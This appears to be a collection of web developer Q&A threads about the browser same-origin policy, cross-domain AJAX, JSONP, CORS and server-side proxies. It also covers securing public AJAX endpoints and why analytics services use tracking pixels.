For what I understand cross-domain AJAX calls are not possible for security reasons.
I've understood that's it's possible to do it by using JSON-P though.
My question: why are cross-domain AJAX calls forbidden, but actually possible in a less practical way? It would be simpler to just authorize it.
How are you supposed to do for those kind of simple scenarios:
geocoding a location by calling Google Maps webservice
fetching Flickr images through its webservice
ajax to a different domain but it's the same application (server farms for example?)
... (those are just examples)
If I have to wrap/proxy these calls with a server-side script, that's just boring and time lost... You can't make a full Javascript application in the end? (if you want to use external webservices I mean)
why are cross-domain AJAX calls forbidden
You are logged on to your bank, right? OK, I'll just make a Ajax request to your bank and read your account number, sort code, and so on.
How are you supposed to do for those kind of simple scenarios
Server side proxy
JSON-P
CORS
If I have to wrap/proxy these calls with a server-side script, that's just boring and time lost
Many things would be easier if we didn't have to worry about security. We wouldn't need locks on doors, passwords on accounts, etc, etc.
Related
I try to wrap my head around how to really secure ajax calls of any kind that are publicly available.
Let’s say the JavaScript on a public page (so no user authentication of any kind) contains an AJAX call to a PHP script (REST API or just a script, it doesn’t matter) that does a lot of heavy lifting. So any user can just look into the source code, find the AJAX call, rebuild and execute it, and execute it again a million times in a second and DDoS your site that way - not so great. At first I thought a HTTP_REFERER check could be helpful, but as any header field, also this is manipulable (just use a curl request) so the gain of security wouldn’t be too high.
The next approach was about a combination of using session ids, cookies, etc. to build some kind of access key for every page viewer and when someone exceeds the limit the AJAX call would run into an error. Sounds great so far, but just by cleaning the cookies, etc. everything will be reseted. So also no real solution. But, of course! Use the IP! Great idea! Users in public networks, that use only one IP for internet access will be totally happy, if one miscreant will block the service for all of them by abusing the call... not. So, also no great solution.
So, I’m really stuck here and can’t think of any great answer for my problem.
I also thought about API keys, or something alike. But that is an information that is also extractable from the JavaScript source. So how to prevent other servers using your service in a proxy kind of manner serving your data to their users? (e.g. you implemented the GMaps API in your website (or any other API) and someone uses your script accessing the API with your key)
tl;dr
Is there any good way to really secure your publicly viewable AJAX calls from abusing them for DDoSing your site, presenting your data on other sites, etc.
I think you're overthinking what AJAX is. When your site makes an ajax request, server side, it's the same as any other page request (even if some scripts are more process intensive). You need to protect your entire site, and not just specific scripts. If your server does not have any DDoS protection, it can be attacked through any page. Look into services like CloudFare
As #Sage Mentioned it is similar to normal http request. You can use normal authentication as the http headers/cookie information will be passed on to the server every time you make ajax call. For clear view you can look into developer console on browser. Its the same as exposing you website root url. Just make sure you have authentications checks for ajax calls too.
I am new to the REST world. I am writing an ASP.NET MVC application. My requirement is to make a few REST calls from the client. I can either choose to make these REST calls from Javascript or I can do that in the C# code in the Controller. Which method is recommended? According to my understanding, the Controller runs on the Web Server and the Javascript runs on the browser. So is there any perf degradation if the REST calls are made from the Web Server.
Can someone suggest me the general practice around this? Are there any security gotchas for the same?
Thanks
Let us consider the pros and cons of doing this Server side
PROs:
You can do other processing on the data using the power of the server
You are not subject to cross domain limitations like you would be in ajax
Generally you do not have to worry about your server being able to access the resource, whereas on client you are at the mercy of users net restrictions, firewalls etc
More control over your http response\request lifecycle
CONS:
You will have to consume more bandwidth sending the resulting data down to the client.
You may have to do more work to leverage good caching practices
Dependant on having certain server side libraries\framework elements
Now although we have a much bigger list of Pros than cons... in the majority of cases you will still want to do this on the client... because the issue of double handling the data is actually a very big one, and will cost you both time and money.
The only reason you should actually do it server side is if you need to do extensive processing on the data, or you cannot circumvent CORS (cross domain) restrictions.
If you are just doing something simple like displaying the information on a webpage, then client side is preferable.
It strongly depends on your situation. If you simple display this data in your page without any actions, you can get it from javascript. If you want to work with this data, transform it, join it with other data or else, i recommend do this operations on server so get this data on server too.
Given the simplicity of writing a server side proxy that fetches data across domains, I'm at a loss as to what the initial intention was in preventing client side AJAX from making calls across domains. I'm not asking for speculation, I'm looking for documentation from the language designers (or people close to them) for what they thought they were doing, other than simply creating a mild inconvenience for developers.
TIA
It's to prevent that a browser acts as a reverse proxy. Suppose you are browsing http://www.evil.com from a PC at your office, and suppose that in that office exists an intranet with sensitive information at http://intranet.company.com which is only accessible from the local network.
If the cross domain policy wouldn't exists, www.evil.com could made ajax requests to http://intranet.company.com, using your browser as a reverse proxy, and send that information to www.evil.com with another Ajax request.
This one of the reasons of the restriction I guess.
If you're the author for myblog.com and you make an XHR to facebook.com, should the request send your facebook cookie credentials? No, that would mean that you could request users' private facebook information from your blog.
If you create a proxy service to do it, your proxy can't access the facebook cookies.
You may also be questioning why JSONP is OK. The reason is that you're loading a script you didn't write, so unless facebook's script decides to send you the information from their JS code, you won't have access to it
The most important reason for this limit is a security concern: should JSON request make browser serve and accept cookies or security credentials with request to another domain? It is not a concern with server-side proxy, because it don't have direct access to client environment. There was a proposal for safe sanitized JSON-specific request methods, but it wasn't implemented anywhere yet.
The difference between direct access and a proxy are cookies and other security relevant identification/verification information which are absolutely restricted to one origin.
With those, your browser can access sensitive data. Your proxy won't, as it does not know the user's login data.
Therefore, the proxy is only applicable to public data; as is CORS.
I know you are asking for experts' answers, I'm just a neophyte, and this is my opinion to why the server side proxy is not a proper final solution:
Building a server side proxy is not as easy as not build it at all.
Not always is possible like in a Third Party JS widget. You are not gonna ask all your publisher to declare a DNS register for integrate your widget. And modify the document.domain of his pages with the colateral issues.
As I read in the book Third Party Javascript "it requires loading an intermediary tunnel file before it can make cross-domain requests". At least you put JSONP in the game with more tricky juggling.
Not supported by IE8, also from the above book: "IE8 has a rather odd bug that prevents a top-level domain from communicating with its subdomain even when they both opt into a common domain namespace".
There are several security matters as people have explained in other answers, even more than them, you can check the chapter 4.3.2 Message exchange using subdomain proxies of the above book.
And the most important for me:
It is a hack.. like the JSONP solution, it's time for an standard, reliable, secure, clean and confortable solution.
But, after re-read your question, I think I still didn't answer it, so Why this AJAX security?, again I think, the answer is:
Because you don't want any web page you visit to be able to make calls from your desktop to any computer or server into your office's intranet
for quite a long time i am looking for a javascript code which can make cross domain GET requests..
i want to make a javascript which makes a GET request to google and fetches the page source and assigns it to a variable..
note:the get requests must be generated from the clients computer and to a different server(eg:google)
Not possible due to the same origin policy which restricts AJAX and iFrames.
However, afaik Google offers a very own AJAX API to fetch search results, thats maybe enough for your needs.
But unless the Google servers don't allow for cross-domain calls (which I don't believe) there is no way in fetching data via a pure client-side AJAX connection.
Disclaimer: it might be possible in some browsers by changing some core settings
Google Analytics embeds a one pixel GIF with a URL like this:
http://www.google-analytics.com/__utm.gif?utmwv=5.1.5&utms=5&utmn=1532897343&utmhn=www.douban.com&utmcs=UTF-8&utmsr=1440x900&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.3%20r181&utmdt=%E8%B1%86%E7%93%A3&utmhid=571356425&utmr=-&utmp=%2F&utmac=UA-7019765-1&utmcc=__utma%3D30149280.1785629903.1314674330.1315290610.1315452707.10%3B%2B__utmz%3D30149280.1315452707.10.7.utmcsr%3Dbiaodianfu.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fgoogle-analytics-architecture.html%3B%2B__utmv%3D30149280.162%3B&utmu=qBM~
Why not use an AJAX call? What's the benefit of using a one-pixel GIF?
Because you can't really do cross domain AJAX (with the exception of CORS, but that's a different story, and a recent phenomenon with less than universal support.) AJAX is for same origin requests. Also, Google Analytics forks from Urchin, which actually predates AJAX technology's adoption.
Requesting an image is pretty standard practice for analytics services "requesting" something as a means of sending something to a third party server. The reason AJAX/CORS doesn't really make sense is that you're not actually requesting an important resource for use on the page, so you want the request itself to be as quick and overhead-less as possible.
The other two ways analytics services occasionally handle sending data from the client is:
Including an invisible iframe, with the query string on the iframe src passing the analytics data
Requesting an image, and instead of returning an image, returning an empty response with a HTTP 204 header.
To maximize compatability. A cell phone browser may not support AJAX, for example, and thus may provide inadequate results. But hey, Google does a lot of funky stuff that nobody can explain.